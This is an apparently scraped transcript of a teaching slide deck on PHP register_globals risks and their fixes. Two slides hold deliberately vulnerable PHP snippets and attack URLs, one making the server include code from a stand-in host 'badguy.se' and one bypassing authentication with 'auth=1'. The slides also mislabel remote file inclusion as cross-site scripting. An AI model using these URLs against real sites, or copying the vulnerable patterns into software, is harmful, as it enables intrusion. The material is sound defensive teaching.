Presentation is loading. Please wait.

Presentation is loading. Please wait.

PHP Security: register_globals How To Make It Difficult For Hackers To Set Variables.

Similar presentations


Presentation on theme: "PHP Security: register_globals How To Make It Difficult For Hackers To Set Variables."— Presentation transcript:

1 PHP Security: register_globals How To Make It Difficult For Hackers To Set Variables

2 What Is register_globals ?  A directive in php.ini to automatically make variables out of environment, GET, POST, cookies, and server data (true/false)  C.f. variables_order (EGPCS)

3 Examples (Part 1) With register_globals turned on, PHP will automatically create variables $mytext and $myhide and populate them with the values entered in the form (whether GET or POST).

4 Examples (Part 2) Similarly, with the URL… http://example.com/index.php?george=jungle …PHP will create $george for you and give it the value “jungle”. Cookie, server, and environment variables such as $DOCUMENT_ROOT and $PHP_SELF are also automatically created and populated. You don’t know where the values came from (EGPCS).

5 Problems (Part 1) <?php // …some code… include “$libdir/functions.inc”; // …more code… ?> If user sets $libdir in the URL, it can override your $libdir value, allowing cross-site scripting. E.g.: http://example.com/index.php?libdir=http://badguy.se/hack

6 Problems (Part 2) <?php if ($auth == 1) { // do stuff for authorized users } else { echo “Not authorized!”; } ?> If user sets $auth in the URL, it can override your $auth value, allowing unauthenticated use. E.g.: http://example.com/index.php?auth=1

7 Solutions (Part 1)  Don’t let anyone see your code If they don’t know what variables to set, they can’t crack your script! Security-through-obscurity Does not work well, if at all  Check all variables before using them Good practice anyway Sometimes hard to check (e.g., $auth)

8 Solutions (Part 2)  Turn off register_globals ! Off by default in PHP 4.2.0 and later anyway  Use the track_vars arrays instead: $_GET $_POST $_SERVER $_FILES $_ENV $_COOKIE  Turned on by default in PHP 4.0.3 and later

9 Solution Examples (Part 1) With register_globals turned off, PHP will populate $_POST[‘mytext’] and $_POST[‘myhide’]. If the method was GET, the values are in $_GET[].

10 Solution Examples (Part 2) If a value is set in the URL… http://example.com/index.php?george=jungle … it becomes $_GET[‘george’] = “jungle” Post-method variables are in $_POST Get-method and URL variables are in $_GET Server variables are in $_SERVER Uploaded files are in $_FILES Cookie values in $_COOKIE Environment settings in $_ENV You know exactly where values are set from.

11 Use define For Path Names  If you you have to set directory paths in variables, use constants instead define(‘LIBDIR’, ‘/path/to/lib’);  Pathnames are especially dangerous in variables since they can lead directly to cross-site scripting security issues  Once set, constants cannot be redefined, making them far more secure against accidental or unexpected value resets and hack attempts

12 References  http://www.php.net/manual/en/security.registerglobals.php http://www.php.net/manual/en/security.registerglobals.php  http://www.php.net/manual/en/security.php http://www.php.net/manual/en/security.php  http://www.zend.com/zend/art/art-oertli.php http://www.zend.com/zend/art/art-oertli.php  http://www.securereality.com.au/studyinscarlet.txt http://www.securereality.com.au/studyinscarlet.txt


Download ppt "PHP Security: register_globals How To Make It Difficult For Hackers To Set Variables."

Similar presentations


Ads by Google